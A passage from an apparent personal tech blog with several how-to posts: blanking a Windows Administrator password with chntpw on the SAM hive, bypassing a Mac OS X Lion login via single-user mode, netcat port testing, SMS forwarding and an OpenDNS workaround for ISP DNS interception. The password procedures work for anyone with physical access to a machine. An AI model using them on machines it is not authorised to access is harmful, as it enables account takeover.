<li><b>cd [mount_location]/WINDOWS/system32/config</b></li>
<li><b>chntpw -l SAM</b></li>
<li><b>chntpw -u Administrator SAM</b></li>
<li>Enter <b>1</b> to blank password</li>
<li>Enter <b>y</b> to write changes</li>
<li><b>chntpw -u Administrator SAM</b></li>
<li>Enter <b>4</b> to unlock and enable the account</li>
<li>Enter <b>y</b> to write changes</li>
<li><b>chntpw -l SAM</b></li>
</ol>
<br />
Keep in mind that as the program warns, it's a bit "hacky". You may have to try it multiple times for it to work. Also, I found interactive mode to be too buggy to even use. I would just use the commands above. You should also know that it is always best to <i>clear</i> the password instead of <i>changing</i> it. The latter has a much lower success rate. If you do clear it, you may want to unplug the network cable until you are able to log into Windows and change it. It may sound paranoid, but you don't want to get hacked because you had a blank password for 60 seconds. Especially on a web server that is on the world wide web.<br />
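One thing the path in step 4 glosses over: NTFS does not care about case, Linux does, and the directory is spelled WINDOWS/system32 on XP but Windows/System32 on Vista and later. Here is an added Python helper (not part of chntpw and not from the original post) that finds the hive regardless of case and checks that the mount is writable before you run the chntpw commands above. The mount point is whatever you pass in; nothing here touches the hive itself.

```python
import os
from typing import Optional

def find_hive(mount_root: str, hive: str = "SAM") -> Optional[str]:
    """Locate <mount>/Windows/System32/config/<hive> without caring about case.
    XP spells the path 'WINDOWS/system32', Vista and later 'Windows/System32',
    and a Linux live CD looks names up case-sensitively, so a literal path
    works on one release and fails on the other."""
    path = mount_root
    for want in ("windows", "system32", "config", hive.lower()):
        try:
            names = os.listdir(path)
        except OSError:                 # not mounted, or not a Windows volume
            return None
        hit = next((n for n in names if n.lower() == want), None)
        if hit is None:
            return None
        path = os.path.join(path, hit)
    return path if os.path.isfile(path) else None

def hive_is_writable(hive_path: str) -> bool:
    """chntpw rewrites the hive in place, so the 'write changes' step cannot
    succeed on a read-only mount; check before starting rather than after."""
    return os.access(hive_path, os.W_OK)

if __name__ == "__main__":
    import sys
    hive = find_hive(sys.argv[1] if len(sys.argv) > 1 else "/mnt/windows")  # placeholder mount
    if hive is None:
        print("no SAM hive under that mount point")
    else:
        print(hive, "writable" if hive_is_writable(hive) else "READ-ONLY: remount rw first")
```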
<br />
I hope this helps you if you are in a jam sometime and have no choice but to do it the old fashioned way with chntpw!<br />
<br />
P.S. I only had a chance to test this on XP using Knoppix 7.0.5, so please leave a comment on your experience with other versions!<br />
<br />
Reset Mac OS X Lion Password (published 2013-01-29T18:02:00-06:00, updated 2013-01-29T10:04:00-06:00)
If you need to reset the password on Mac OS X Lion but you don't have any secondary admin accounts, it's actually pretty easy. Even if you don't have an install disc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQPvmBY6staTglzXLKwJ2eP5dyi6F-nDDZYuDTF9zOVaZPr2Dc_H3qGPEC8-8uCzbzoUHW-DAYxsl05SMqwCZosQp5kHeZe4LbLPpXOSA94yvsVlMSMLRVta6ZrFzl24JCLRa2YpILDg/s1600/photo(1).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQPvmBY6staTglzXLKwJ2eP5dyi6F-nDDZYuDTF9zOVaZPr2Dc_H3qGPEC8-8uCzbzoUHW-DAYxsl05SMqwCZosQp5kHeZe4LbLPpXOSA94yvsVlMSMLRVta6ZrFzl24JCLRa2YpILDg/s400/photo(1).JPG" width="400" /></a></div>
<br />
Different versions of OS X require different stuff but this post specifically applies to Lion. (That's the only OS I tested it on, at least.) So here are the instructions:<br />
<br />
1. Power up the Mac<br />
2. As soon as you see the gray screen, hold down Command-S<br />
3. Let go once you see text on a black background<br />
4. Once the text stops scrolling, hit enter<br />
5. Enter this command: <i>mount -uw /</i><br />
6. Enter this command: <i>rm /var/db/.AppleSetupDone</i><br />
7. Enter this command: <i>reboot</i><br />
8. Go through the setup wizard and choose defaults. Do not import any data, etc. Name your user something like temp<br />
9. Login as the new user<br />
10. Navigate to System Preferences>Users & Groups, click the padlock icon and authenticate<br />
11. Select the user who you want to reset the password for and click Reset Password<br />
12. After resetting the password, logout<br />
13. Login as the user that you reset the password for<br />
14. When you get the keychain dialog, you will likely just want to just choose new, but it's up to you<br />
15. Delete the temp user you created<br />
<br />
The end!<br />
<br />
If you are not sure what version of OS X you have, you may want to type the following command right after step 4: <i>uname -a</i> The information displayed can be checked against <a href="http://en.wikipedia.org/wiki/Darwin_%28operating_system%29" target="_blank">here</a> or by googling to determine the operating system.<br />
<br />
Although it is always a good idea to have backups and I can't be held liable for data loss, etc., the method above is one that should <i><b>not</b></i> harm any data at all. So don't freak out. This method should not remove data from the user account you are trying to get into.<br />
<br />
<br />
Enjoy!
Test open ports by chatting from the command line (published 2012-11-23T23:02:00-06:00, updated 2012-11-27T08:51:36-06:00)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfBG2acAq0LrvFLgQZydThhmk5oKMJCc9QHItqCmmBbBDD9y1VENJWCRitpQsyaSl9J9z_LVTfQCN3S9Lyzec4_Kv7kDumCaQPFY0havSsNAdVPBFjfZvHFdJ0rATxKn5-jhkgWAtAGg/s1600/netcat2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfBG2acAq0LrvFLgQZydThhmk5oKMJCc9QHItqCmmBbBDD9y1VENJWCRitpQsyaSl9J9z_LVTfQCN3S9Lyzec4_Kv7kDumCaQPFY0havSsNAdVPBFjfZvHFdJ0rATxKn5-jhkgWAtAGg/s1600/netcat2.png" /></a></div>
<br />
Today I needed to test whether or not a specific TCP/IP port on a firewall/server was open and whether or not traffic could successfully flow via that port without firewall interference. I needed to do this independent of the normal server application that handles this for testing purposes. I just needed to make sure the firewall aspect was all set to go.<br />
<br />
Well, why not solve this problem with <a href="http://en.wikipedia.org/wiki/Netcat" target="_blank">netcat</a>? Here's how I did it...<br />
<br />
First, I put a box booted into <a href="http://www.knopper.net/knoppix/index-en.html" target="_blank">Knoppix</a> at Site A and a Mac with Mountain Lion at Site B. (Netcat also exists for Windows.) I then disabled the Mountain Lion firewall temporarily and started up the netcat server at Site B:<br />
<br />
<b>nc -vl 666</b><br />
<br />
The -v is for verbose, of course, and the -l tells it to be the listener/server. The 666 is the port it will listen on, lol. (All IP addresses and ports have been changed to protect the innocent.)<br />
<br />
At Site A, I then had someone run this command on the Knoppix rig:<br />
<br />
<b>nc -v 172.31.31.31 666</b><br />
<br />
This caused netcat to connect to the remote server via its IP address on port 666. At that point, I started chatting over the command line back and forth with the person at Site A as if we were instant messaging. Who knew this could be so fun?! When I typed something on my screen and pressed enter, it appeared on their command line terminal and vice versa. Interestingly, until I solved a firewall issue, the netcat client would connect, but when you typed text, you couldn't see it on the other end.<br />
<br />
This utility is very useful and this post only shows <a href="http://digiassn.blogspot.com/2006/01/dd-over-netcat-for-cheap-ghost.html" target="_blank">one of many things</a> netcat can do. By default, netcat uses TCP. For checking UDP, simply add the -u switch to the command on both the server and the client. The -4 switch forces netcat to use IPv4, which helps avoid problems.<br />
<br />
This was a very lightweight, portable and easy way to test connectivity on a specific port and required no installation or configuration at all. This also allowed me to test completely independent of any normal server applications, etc. to rule out the possibility of any firewall filtering. [does happy little geek dance]<br />
<br />
<br />
<br />
<br />
<b>Forward your Android SMS to email</b> (2012-11-18)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKsPGmhrkBTbAWRPN05PN-3fJB-VnuwMLsXaVhji3ha1M4pQEp4JL8ph9SRRkDwRXbsMZP0dJ9JYJuTxL7dwOxGHfIM500NjXTEqcUlh7eG86cuw27CN0w7YL1TfAKYb-aIM9AJWWGsU/s1600/sms1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKsPGmhrkBTbAWRPN05PN-3fJB-VnuwMLsXaVhji3ha1M4pQEp4JL8ph9SRRkDwRXbsMZP0dJ9JYJuTxL7dwOxGHfIM500NjXTEqcUlh7eG86cuw27CN0w7YL1TfAKYb-aIM9AJWWGsU/s320/sms1.png" width="320" /></a></div>
<br />
There are apps out there that forward your SMS to your email, but in my experience they all either don't work or cost money. Being the cheapskate that I am, I definitely wasn't going to pay money for something like that, so I started brainstorming.<br />
<br />
I needed something to be running on my Android phone that would grab my texts and email them to me. That way if I get an SMS and my phone is in the other room charging or something I could see it on my iPad, etc. Using Google Voice for this kind of stuff is not a perfect solution because they only forward SMS that was sent to your Google number, not to your actual cell phone number.<br />
<br />
I played around with a couple of apps and never could get the email feature to work. I did, however, get the feature to forward the SMS to another phone number to work. So I set up the free Android app "SMS Forwarding" to forward to my email via my IFTTT phone number and problem solved! Here's how to do it:<br />
<br />
1. Set up a free <a href="http://ifttt.com/">ifttt.com</a> account<br />
<br />
2. Set up my shared IFTTT recipe, which you can find here: <a href="https://ifttt.com/recipes/66951">https://ifttt.com/recipes/66951</a>. You'll have to confirm your phone number and email address with IFTTT and whatnot, but it's pretty self-explanatory.<br />
<br />
3. Install free Android app "<a href="https://play.google.com/store/apps/details?id=com.intensoft.smstransfer&hl=en" target="_blank">SMS Forwarding</a>" on your Android phone. I believe the version I am using is 1.4.3.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH0dsLad35YSTKnAlWC0UY1CeCD2SPOmYS5cC3EkY08SpQ3vp_8WG-zFU7el9ffkN6gPkuOhE2FyNiTaR-TJqLqMEJX4O3XVegQDKRqeQYlzvwc_V86vJDlgUPoXZbtYjzrD9bEVyCvj4/s1600/sms2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH0dsLad35YSTKnAlWC0UY1CeCD2SPOmYS5cC3EkY08SpQ3vp_8WG-zFU7el9ffkN6gPkuOhE2FyNiTaR-TJqLqMEJX4O3XVegQDKRqeQYlzvwc_V86vJDlgUPoXZbtYjzrD9bEVyCvj4/s1600/sms2.png" /></a></div>
<br />
4. Set up the "SMS Forwarding" app to forward all your SMS messages to your IFTTT phone number. To do this, open the app, check "Enable Forwarding" and check "Forward with SMS". Then select "Destination Number" and enter your IFTTT phone number. You can find your IFTTT phone number by viewing your IFTTT recipe or your IFTTT SMS channel. Here's a screenshot of the app before configuration has taken place. (Don't copy these settings.) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ2P-8TTn6V9yq6eXMxnMn32VK253DPszgSE5QlHXZZkj3kuZmkGyMxhyphenhyphen8xj5pyvvea_ELbr2ip-RuIzWB57J-CMMMLFvZ-K2xkZNYeU8tE3T3oDPCU3oZaIs9Kp85Eb3RkTslp9zOKc/s1600/sms3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ2P-8TTn6V9yq6eXMxnMn32VK253DPszgSE5QlHXZZkj3kuZmkGyMxhyphenhyphen8xj5pyvvea_ELbr2ip-RuIzWB57J-CMMMLFvZ-K2xkZNYeU8tE3T3oDPCU3oZaIs9Kp85Eb3RkTslp9zOKc/s320/sms3.png" width="180" /></a></div>
<br />
5. Test it out. It should be good to go now!! Mine's working great! You can also set up "SMS Forwarding" to notify you of missed calls and low battery, but I haven't tried those yet. Be sure to comment if you try them!<br />
<br />
BTW, <a href="http://ifttt.com/">ifttt.com</a> is awesome! There are a zillion different things you can do with this free service...<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>Stop your ISP from intercepting your DNS queries</b> (2012-11-15)<br />
My ISP hacked me.<br />
<br />
Dude, by default they intercept all customers' DNS queries and redirect them to their DNS servers. Then, they answer the DNS queries with their servers and spoof the originating server within the DNS response to make it look like they didn't intercept it. They're a regular man-in-the-middle! Total lameness.<br />
<br />
Now, normally this wouldn't bother me too much because I would prefer to use an ISP's DNS servers. They will typically be your fastest resource for a DNS response. But spoofing responses to me? That's over the top. What if I wanna use OpenDNS to filter my internet? Or what if I just simply wanna troubleshoot a DNS issue by querying another ISP's DNS server? No go.<br />
<br />
I know why they do this. They are trying to control bandwidth on their end. But this is a little extreme.<br />
<br />
There's another side to this: My ISP's DNS servers stink!! They go down for 10 minutes at a time without warning. During these periodic outages I can ping by IP address but not by name and the internet is effectively dead. Total lameness.<br />
<br />
So… we have DNS servers that aren't reliable, and we have an ISP that forces you to use the bad DNS servers. Great situation!<br />
<br />
After fighting with my ISP's customer service and getting nowhere, I decided it was time to take matters into my own hands and solve this problem myself.<br />
<br />
First, I proved this was indeed the problem by setting my WZR-HP-G300NH2/Gargoyle (see previous <a href="http://breakstuffmajorly.blogspot.com/2012/11/use-gargoyle-to-control-bandwidth.html" target="_blank">post</a>) router to use Google's DNS servers and then checking the logs. The logs showed that I was actually talking to my ISP's DNS servers even when I made queries to Google!<br />
<br />
I started thinking… They've got to be intercepting this based on port number… What if there was a DNS server out there somewhere that actually listened on an alternate port? Lo and behold, there is! OpenDNS' servers listen on both 53 and 5353! Now all I needed to do was make Gargoyle/OpenWRT talk to their servers on the alternate port, thus circumventing my ISP's DNS servers!<br />
<br />
Using a <a href="http://wiki.openwrt.org/inbox/dnscrypt" target="_blank">wiki</a> designed for setting up <a href="http://www.opendns.com/technology/dnscrypt/" target="_blank">DNSCrypt</a> on OpenWRT (which maybe I will set up sometime), I SSHed to the router and backed up /etc/config/dhcp and then edited it using vi (I also backed up my config from the web interface):<br />
<br />
<b>cp /etc/config/dhcp /etc/config/dhcp.bak</b><br />
<b>vi /etc/config/dhcp</b><br />
<br />
If you don't know how to use vi, check <a href="http://www.lagmonster.org/docs/vi.html" target="_blank">here</a>. As shown below, under the "config dnsmasq" section I then commented out the "option resolvfile" line and added 3 more lines under that line:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLze1Cm9BK-0B2C17KwARkRx1UhJ5meEJUeCl_LYmbTJvsDrkDOUsTmLfX0ShI5UU5lTlH5rPFwq5-rj9vhXv8Y8gYPJDMRSfWtE37oB-jSgDQmic-1RqbX6NjI1kM0lTLmkf6YUT1Bn4/s1600/dhcp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLze1Cm9BK-0B2C17KwARkRx1UhJ5meEJUeCl_LYmbTJvsDrkDOUsTmLfX0ShI5UU5lTlH5rPFwq5-rj9vhXv8Y8gYPJDMRSfWtE37oB-jSgDQmic-1RqbX6NjI1kM0lTLmkf6YUT1Bn4/s1600/dhcp.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
EDIT: Just to clarify, here are the three lines I added below the commented line:<br />
<br />
option noresolv '1'<br />
list server '208.67.222.222#5353'<br />
list server '208.67.220.220#5353'<br />
<br />
(Make sure you match the formatting/spacing shown in the image.)<br />
<br />
As you can see, the last 2 lines tell the router to use OpenDNS' servers and talk to them on alternate port 5353. Then I created an <a href="http://www.opendns.com/" target="_blank">OpenDNS</a> account (not necessary) and restarted the router's DNS daemon:<br />
<br />
<b>/etc/init.d/dnsmasq restart</b><br />
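Scripting the edit described above, as an added example that is not from the original post: it makes the same three-line change to /etc/config/dhcp, keeps a .bak copy as the author did, and checks the result against the config file. The function names and the guard against applying the change twice are my additions; it assumes POSIX sh with awk, which busybox on OpenWrt provides.<br />

```shell
#!/bin/sh
# Added example (not from the original post). Inside the "config dnsmasq"
# stanza of an OpenWrt/Gargoyle /etc/config/dhcp, comment out "option
# resolvfile" (so dnsmasq stops reading the ISP-supplied resolvers) and insert
# the three lines that pin dnsmasq to OpenDNS on alternate port 5353.
# Assumes POSIX sh plus awk; other stanzas are left untouched.

OPENDNS_PORT=5353
OPENDNS_SERVERS="208.67.222.222 208.67.220.220"

# patch_dnsmasq_config FILE -> prints the rewritten config on stdout.
patch_dnsmasq_config() {
    awk -v port="$OPENDNS_PORT" -v servers="$OPENDNS_SERVERS" -v q="'" '
        /^config dnsmasq/ { in_dnsmasq = 1 }
        /^config / && !/^config dnsmasq/ { in_dnsmasq = 0 }
        in_dnsmasq && /^[[:space:]]*option resolvfile/ && !done {
            # Keep the original indentation so the uci parser still accepts it.
            match($0, /^[[:space:]]*/)
            indent = substr($0, 1, RLENGTH)
            print indent "#" substr($0, RLENGTH + 1)
            print indent "option noresolv " q "1" q
            n = split(servers, s, " ")
            for (i = 1; i <= n; i++)
                print indent "list server " q s[i] "#" port q
            done = 1
            next
        }
        { print }
    ' "$1"
}

# apply_dnsmasq_patch FILE -> back up FILE to FILE.bak and rewrite it in place;
# refuses to run twice, since that would duplicate the server lines.
apply_dnsmasq_patch() {
    cfg="$1"
    if grep -q "list server '[0-9.]*#$OPENDNS_PORT'" "$cfg"; then
        echo "$cfg already points dnsmasq at port $OPENDNS_PORT" >&2
        return 0
    fi
    cp "$cfg" "$cfg.bak" || return 1
    patch_dnsmasq_config "$cfg.bak" > "$cfg"
}

# config_uses_alt_port FILE -> 0 when FILE forwards to both OpenDNS servers on
# OPENDNS_PORT and no active resolvfile line remains (the check the author did
# by reading the router log, done against the config instead).
config_uses_alt_port() {
    for srv in $OPENDNS_SERVERS; do
        grep -q "^[[:space:]]*list server '$srv#$OPENDNS_PORT'" "$1" || return 1
    done
    grep -q "^[[:space:]]*option noresolv '1'" "$1" || return 1
    ! grep -q "^[[:space:]]*option resolvfile" "$1"
}
```

After apply_dnsmasq_patch /etc/config/dhcp, restart dnsmasq with the command above for the change to take effect.<br />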
<br />
Now, OpenDNS has a page at <a href="http://internetbadguys.com/">http://internetbadguys.com</a> that they block just for testing purposes, so I went to a computer to see if I was successfully blocked (I cleared the DNS cache on the computer first):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tHSYYg3i1T7aaXhD_N1AINIQOZ9WFpoRcmt9yLRN2E6HhnuQcw3IQnF5v660ODcuNze-UHRdE7RNk_0usMYQbBU3JYDssgIYBWH2r_2ZFCzNn8vaVQReqQeJSTOk-IJ3pklGLXIPOmo/s1600/badguys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tHSYYg3i1T7aaXhD_N1AINIQOZ9WFpoRcmt9yLRN2E6HhnuQcw3IQnF5v660ODcuNze-UHRdE7RNk_0usMYQbBU3JYDssgIYBWH2r_2ZFCzNn8vaVQReqQeJSTOk-IJ3pklGLXIPOmo/s400/badguys.png" width="400" /></a></div>
<br />
Good! Here's what would have been shown had I not been successfully blocked by OpenDNS' filtering:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPhPKqZjC8K8MEQx_uB63aXmXacjIlp8hk1ULAFxSLUUl9QnFNPWz-0GD66OssPtqMwrtBKFnCIiae3peyiXd-LNHXs3b3hbm_55yHHSJgRl0fAvTQSnlpfCfK-eQB1ZoYI-s0IbL5rs/s1600/badguys2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPhPKqZjC8K8MEQx_uB63aXmXacjIlp8hk1ULAFxSLUUl9QnFNPWz-0GD66OssPtqMwrtBKFnCIiae3peyiXd-LNHXs3b3hbm_55yHHSJgRl0fAvTQSnlpfCfK-eQB1ZoYI-s0IbL5rs/s400/badguys2.png" width="325" /></a></div>
<br />
<br />
<br />
I also checked my router logs and found lots of entries with 208.67.222.222:5353:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiogH-H9yh80xnec48I99EMI15PsxO_58IkOcvpwHdkl7b-VQzchPmHJPjQ9O5IKSZ-Jp1cxMhi17LgR9vzkY-zgWRF6cbv14l7Karla39mD27KG8lNu950lNEQWvcdhQtJnJ-fsefiEqQ/s1600/logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiogH-H9yh80xnec48I99EMI15PsxO_58IkOcvpwHdkl7b-VQzchPmHJPjQ9O5IKSZ-Jp1cxMhi17LgR9vzkY-zgWRF6cbv14l7Karla39mD27KG8lNu950lNEQWvcdhQtJnJ-fsefiEqQ/s400/logs.png" width="400" /></a></div>
<br />
<br />
Very good!! I searched my logs further for any queries to my ISP's DNS server and found none! I then backed up my router config, flushed the DNS cache on my boxes and laughed all the way home:<br />
<br />
Windows: ipconfig/flushdns<br />
Mac OS X ML: sudo killall -HUP mDNSResponder<br />
<br />
<b>Recap:</b><br />
My ISP = fail<br />
My ISP = pwned<br />
Me = Happy!<br />
<br />
<br />
<br />
<br />
<b>Determine your home router's IP address remotely</b> (2012-11-14)<br />
Today I needed to determine the public IP address that my home network was using, but I was not physically located at home and didn't have a means of remote access into my network without the IP address. (I'm working on getting dynamic DNS and remote access and all that but it isn't up yet.)<br />
<br />
So, I thought really hard about what I could do and it came to me...<br />
<br />
I happened to know that there was a computer on my home network with a browser window open to Gmail... So I logged into Gmail from my remote location and scrolled all the way down. In the bottom right hand corner, this was displayed:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4jmxqYzT5lU0FORNZtzJYr0RriiD7OYIYziTGf_LhMhiHqfzY54tcXh07DKviEJ97Ocvlz2EMOEjMtN0t7ol6zoTJUMgXZw7rUIBdvHrQaVd7EKwlV8RtFANF3tgaIaerBbSvgazNfI/s1600/Screen+Shot+2012-11-15+at+11.57.02+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4jmxqYzT5lU0FORNZtzJYr0RriiD7OYIYziTGf_LhMhiHqfzY54tcXh07DKviEJ97Ocvlz2EMOEjMtN0t7ol6zoTJUMgXZw7rUIBdvHrQaVd7EKwlV8RtFANF3tgaIaerBbSvgazNfI/s320/Screen+Shot+2012-11-15+at+11.57.02+AM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I clicked "Details" and there was my home IP! This saved my bacon!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQHRVvgzy9CPXmyNfsVVuinFlsOdzPNU8LA-tTcfcRF3cbUR6zYf76Kt5zC0tDy2H1xTEozHDqGlmYj1D95ZFfKfnmf3wz2UKYi4of7-0uEGN0M-dFOfZWaBNOUseQPW348zux9mmZPw/s1600/ip2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQHRVvgzy9CPXmyNfsVVuinFlsOdzPNU8LA-tTcfcRF3cbUR6zYf76Kt5zC0tDy2H1xTEozHDqGlmYj1D95ZFfKfnmf3wz2UKYi4of7-0uEGN0M-dFOfZWaBNOUseQPW348zux9mmZPw/s400/ip2.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />